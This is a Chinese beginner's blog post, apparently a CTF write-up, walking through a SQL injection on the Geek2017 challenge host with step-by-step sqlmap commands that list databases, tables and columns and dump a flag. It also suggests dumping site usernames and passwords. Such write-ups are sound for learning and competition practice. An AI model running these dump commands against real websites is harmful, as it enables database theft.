第一次完成了一个注入呢,虽然是恬不知耻的用sqlmap跑出来的
简单介绍注入时后台的数据等级,有助于后面的理解
①可以类比成一个装着excel文件的文件夹,每一个excel文件就相当于一个数据库
②库的下一级是表,相当于一个文件中存在的sheet表
③表的下级是列
④每一列中又有字段,可以相当于excel中的一个格格啦
简单记一下步骤,大佬们不要嘲笑我这个菜鸡啦
1、获得注入点,一般在URL末尾存在参数
2、爆出所有数据库名称
3、选定数据库,列出其中的表
4、列出选定表中的列
5、列出选定列中的所有字段
6、爆出相应字段
下面以Geek2017的“Cloud的错误”实践一下(大佬们我错了,忘了不能先开wp的规则,这次先隐藏,求轻踩)
网页的源码中有提示"sycid=1",很明显这就是注入点的参数格式啦,丢sqlmap咯
1、检测注入点可用
sqlmap -u http://game.sycsec.com:2007/?sycid=1
-u :指定注入url
2、暴库
sqlmap -u http://game.sycsec.com:2007/?sycid=1 --dbs
--dbs :曝出该sqlserver中所有数据库名称
结果:好像看到了很有趣的“f1ag”库
3、列出数据库中的表
sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag --tables
-D:指定数据库名称(datebase)
--tables:列出表
可以看到“f1ag”下只有一个“flag”表
4、列出表中的列
sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag -T flag --columns
-T:指定表名(table)
--columns:打印列名
结果:这里列出了表中的两个列,
这里有个问题,在图形展示的列的名字是不完整的,而应该去上面箭头位置寻找完整的列名
5、爆出此列中的字段
sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag -T flag -C f4ag --dump
-C :指定要暴的列
--dump:把字段展示出来
结果:就看到我们最喜欢的flag啦!
除了这些,还可以爆网站的用户名密码,以后有机会试试咯
参考网站:http://blog.csdn.net/zgyulongfei/article/details/41017493
作者:辣鸡小谱尼
出处:http://www.cnblogs.com/ZHijack/
如有转载,荣幸之至!请随手标明出处;
来源:https://www.cnblogs.com/ZHijack/p/7725874.html